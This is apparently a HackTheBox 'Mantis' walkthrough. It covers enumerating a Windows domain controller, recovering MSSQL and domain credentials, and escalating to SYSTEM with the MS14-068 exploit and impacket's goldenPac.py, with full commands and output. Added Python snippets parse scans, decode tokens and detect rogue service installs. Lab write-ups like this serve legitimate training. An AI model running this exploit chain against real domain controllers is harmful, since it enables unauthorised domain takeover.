
A Penetration Testing Walkthrough

This one took a lot of patience and a great deal of enumeration, but the process was also very cool, because I had never done anything like it before. In the end it was great to finally see a domain controller on HackTheBox.

root@kali:~/htb/mantis# nmap -A 10.10.10.52

Starting Nmap 7.50 ( https://nmap.org )
Nmap scan report for 10.10.10.52
Host is up (0.11s latency).
Not shown: 981 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-02-09T14:23:56
|_Not valid after:  2048-02-09T14:23:56
|_ssl-date: 2018-02-09T14:30:53+00:00; 0s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:


Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   10.10.10.52:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2018-02-09T09:30:52-05:00
| smb-security-mode:
|   account_used:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   52.42 ms  10.10.14.1
2   252.79 ms 10.10.10.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.56 seconds

OK, there is quite a lot to see here. LDAP is open, which, more precisely, tells us this is a domain controller, and it is also running IIS on port 8080.
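The port combination above is what gives the domain controller away. As an added example (not part of the original post), here is a small Python parser for nmap's port table that extracts the open services and flags the Kerberos/LDAP/SMB/kpasswd/global-catalog combination; the sample input is constructed from lines of the scan above, and the DC_PORTS heuristic is my own assumption.

```python
import re

# Constructed sample: port lines taken from the nmap -A output above
SAMPLE_SCAN = """\
53/tcp open domain Microsoft DNS 6.1.7601
88/tcp open tcpwrapped
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
8080/tcp open http Microsoft IIS httpd 7.5
"""

# "<port>/<proto> <state> <service> [<version...>]" as nmap prints it
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
DOMAIN = re.compile(r"Domain:\s*([\w.-]+)")

# Heuristic (my assumption): Kerberos, LDAP, SMB, kpasswd and the global
# catalog all open on one host is the signature of an AD domain controller.
DC_PORTS = {88, 389, 445, 464, 3268}


def parse_ports(scan_text):
    """Return {port: (service, version)} for every open TCP port in the scan."""
    ports = {}
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(2) == "tcp" and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5) or "")
    return ports


def classify_host(scan_text):
    """Summarise the exposure: open ports, whether it is a DC, and which domain."""
    ports = parse_ports(scan_text)
    domain = None
    for _, version in ports.values():
        m = DOMAIN.search(version)  # nmap's LDAP probe reports the AD domain
        if m:
            domain = m.group(1)
            break
    return {
        "open_ports": sorted(ports),
        "is_domain_controller": DC_PORTS <= set(ports),
        "domain": domain,
        "missing_dc_ports": sorted(DC_PORTS - set(ports)),
    }
```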

There is only a login page here, but no username, and gobuster has not returned anything yet, so we can try enumerating Kerberos usernames, which might give us some information.

root@kali:~/htb/mantis# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="htb.local",userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.52

Starting Nmap 7.50 ( https://nmap.org )
Nmap scan report for 10.10.10.52
Host is up (0.068s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_    James@htb.local

That was not the result we hoped for, so let's run a full port scan with nmap to see whether there is another way in.

root@kali:~/htb/mantis# nmap -p- 10.10.10.52 -T4

Starting Nmap 7.50 ( https://nmap.org )
Initiating Ping Scan at 10:05
Scanning 10.10.10.52 [4 ports]
Completed Ping Scan at 10:05, 0.42s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:05
Completed Parallel DNS resolution of 1 host. at 10:05, 6.18s elapsed
Initiating SYN Stealth Scan at 10:05
Scanning 10.10.10.52 [65535 ports]
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49164/tcp open  unknown
49166/tcp open  unknown
49168/tcp open  unknown
50255/tcp open  unknown

With the scan complete, we can see that port 1337 is open. It serves a default IIS page.

Let's point gobuster at the newly found port.

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.52:1337/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/secure_notes (Status: 301)

The web.config file returns a 404. The title of the dev notes file looks somewhat like base64. The notes give a username, admin, and a database name, orcharddb.

Let's try base64-decoding the file name.

root@kali:~/htb/mantis# base64 -d
6d2424716c5f53405f504073735730726421

This doesn't match any hash length, but it does look like hex.

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
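The same base64-then-hex peeling, generalised as an added example (not from the original post): a Python helper that strips encoding layers from a suspicious token until the result is plain printable text and decodes no further. Hex is tried before base64 because every hex string is also syntactically valid base64. SAMPLE_TOKEN is constructed here by base64-encoding the hex string found above; the helper names are my own.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _try_hex(token):
    """Decode clean hex to text, or None if it is not hex or not UTF-8."""
    if not token or len(token) % 2 or not all(c in string.hexdigits for c in token):
        return None
    try:
        return bytes.fromhex(token).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _try_base64(token):
    """Decode standard base64 (padding optional) to text, or None."""
    if not token or not all(c.isalnum() or c in "+/=" for c in token):
        return None
    try:
        padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def peel_encodings(token, max_layers=4):
    """Return [(layer, value), ...]; the last value is the innermost text.

    A layer is only accepted if it yields printable text, so binary garbage
    from a false-positive decode stops the loop instead of being kept.
    """
    steps = [("raw", token)]
    current = token
    for _ in range(max_layers):
        for name, fn in (("hex", _try_hex), ("base64", _try_base64)):
            decoded = fn(current)
            if decoded and decoded != current and all(ch in PRINTABLE for ch in decoded):
                steps.append((name, decoded))
                current = decoded
                break
        else:
            break  # neither layer applies any more
    return steps


# Constructed sample: the hex string from the page, wrapped once more in base64
SAMPLE_HEX = "6d2424716c5f53405f504073735730726421"
SAMPLE_TOKEN = base64.b64encode(SAMPLE_HEX.encode()).decode()
```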

Let's get going. Finally, some working credentials. If we try to connect to MSSQL with sqsh using the sa user and this password, access is denied. But using the password with the admin user might get us in.

root@kali:~/htb/mantis# sqsh -S 10.10.10.52 -U admin
sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type "warranty"
Password:
1>

Let's enumerate the table names in orcharddb.

Note: I have cleaned up the formatting below; sqsh's output formatting is terrible. If needed, you can write the output to a CSV file and view it elsewhere with "go -m csv > /root/htb/mantis/table.csv".

1> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
2> go
TABLE_NAME
-------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord

(62 rows affected)

The blog_Orchard_Users_UserPartRecord table looks like what we need.

1> USE orcharddb;
2> go
1> SELECT * FROM blog_Orchard_Users_UserPartRecord;
2> go

Row 1
  Id: 2
  UserName: admin
  Email:
  NormalizedUserName: admin
  Password: AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
  PasswordFormat: Hashed
  HashAlgorithm: PBKDF2
  PasswordSalt: UBwWF1CQCsaGc/P7jIR/kg==
  RegistrationStatus: Approved
  EmailStatus: Approved
  EmailChallengeToken: NULL
  CreatedUtc: Sep 1 2017 01:44PM
  LastLoginUtc: Sep 1 2017 02:03PM
  LastLogoutUtc: Sep 1 2017 02:06PM

Row 2
  Id: 15
  UserName: James
  Email: james@htb.local
  NormalizedUserName: james
  Password: J@m3s_P@ssW0rd!
  PasswordFormat: Plaintext
  HashAlgorithm: Plaintext
  PasswordSalt: NA
  RegistrationStatus: Approved
  EmailStatus: Approved
  EmailChallengeToken: NULL
  CreatedUtc: Sep 1 2017 01:45PM
  LastLoginUtc: NULL
  LastLogoutUtc: NULL

(2 rows affected)

We have a password. Let's test these credentials over SMB to see whether they are valid Windows credentials.

root@kali:~/htb/mantis# smbclient -L 10.10.10.52/ -U james
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\james's password:
Domain=[HTB] OS=[] Server=[]

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share

They are indeed valid, and we can list shares on the machine. We can see two Group Policy Objects, but nothing of much use.

Exploitation

Our credentials do not get us a shell through winexe, so we have to find another way. Since we know this is a domain controller, perhaps we can leverage Kerberos to get what we want.

A detailed write-up of how this attack works: http://adsecurity.org/?p=541

Install the latest version of impacket after satisfying its dependencies. Edit the hosts file and add the domain controller.

Now we configure /etc/krb5.conf.

Let's sync our clock with the DC.

rdate -n 10.10.10.52

Now we are ready to start the exploitation. First, build the impacket tools.

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# kinit james
Password for james@HTB.LOCAL:
root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL

Valid starting       Expires              Service principal
02/09/2018 15:29:07  02/10/2018 01:29:07  krbtgt/HTB.LOCAL@HTB.LOCAL
	renew until 02/10/2018 15:28:37

Next we need James's SID.

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# rpcclient -U james mantis
Enter WORKGROUP\james's password:
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

Now we can run the ms14-068 Python exploit script.

root@kali:~/htb/mantis/pykek-master# python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis
Password:
  [+] Building AS-REQ for mantis... Done!
  [+] Sending AS-REQ to mantis... Done!
  [+] Receiving AS-REP from mantis... Done!
  [+] Parsing AS-REP from mantis... Done!
  [+] Building TGS-REQ for mantis... Done!
  [+] Sending TGS-REQ to mantis... Done!
  [+] Receiving TGS-REP from mantis... Done!
  [+] Parsing TGS-REP from mantis... Done!
  [+] Creating ccache file "TGT_james@HTB.LOCAL.ccache"... Done!

By default, the ticket-granting ticket (TGT) the client uses for any user is read from the default Kerberos credential cache, located at /tmp/krb5cc_uid. So now that we have the cache file, we need to copy it to the proper location.

With everything in place, we can use impacket's goldenPac.py tool to get our shell.

root@kali:~/htb/mantis/impacket-master/impacket-master/examples# ./goldenPac.py HTB.LOCAL/james@mantis
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

Password:
User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
Forest SID: S-1-5-21-4220043660-4019079961-2895681657
Attacking domain controller mantis.htb.local
mantis.htb.local found vulnerable!
Requesting shares on mantis.....
Found writable share ADMIN$
Uploading file cugfXzCt.exe
Opening SVCManager on mantis.....
Creating service QcYY on mantis.....
Starting service QcYY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami & hostname
nt authority\system
mantis

We have successfully obtained a SYSTEM shell.
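From the defender's side, the way goldenPac.py gets its shell above (a randomly named executable uploaded to ADMIN$, a randomly named service created and started through the service manager) is visible in the Windows System log as a service-install event. As an added example (not part of the original post), here is a Python check over constructed, simplified key=value log lines that flags such installs; the 7045/7036 event IDs are the real Service Control Manager IDs, but the line format and the name heuristics are my own assumptions, not the real event text.

```python
import ntpath
import re

# Constructed sample in a simplified "key=value" form (my assumption, not the real
# event text): three service-install events (7045) and one state change (7036).
SAMPLE_EVENTS = [
    r"EventID=7045 Host=mantis ServiceName=QcYY ImagePath=C:\Windows\cugfXzCt.exe Account=LocalSystem",
    r"EventID=7045 Host=mantis ServiceName=Spooler ImagePath=C:\Windows\System32\spoolsv.exe Account=LocalSystem",
    r"EventID=7045 Host=mantis ServiceName=MSSQLSERVER ImagePath=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe Account=NT Service\MSSQLSERVER",
    r"EventID=7036 Host=mantis ServiceName=QcYY State=running",
]

KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
# A binary sitting directly in the Windows root, i.e. dropped through the ADMIN$ share
WINDOWS_ROOT = re.compile(r"^[a-z]:\\windows\\[^\\]+$", re.IGNORECASE)


def parse_event(line):
    return dict(KV.findall(line))


def looks_generated(name):
    """Names like QcYY or cugfXzCt: letters only, short, with frequent case flips."""
    if not name.isalpha() or len(name) > 12:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 2


def flag_service_installs(lines):
    """Return (service, image, reasons) for installs that match two or more signals."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7045":
            continue
        image = ev.get("ImagePath", "")
        reasons = []
        if WINDOWS_ROOT.match(image):
            reasons.append("binary dropped directly into the Windows root")
        if looks_generated(ev.get("ServiceName", "")):
            reasons.append("service name looks machine-generated")
        if looks_generated(ntpath.splitext(ntpath.basename(image))[0]):
            reasons.append("binary name looks machine-generated")
        if len(reasons) >= 2:  # one signal alone is too noisy on a busy host
            hits.append((ev.get("ServiceName", ""), image, reasons))
    return hits
```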

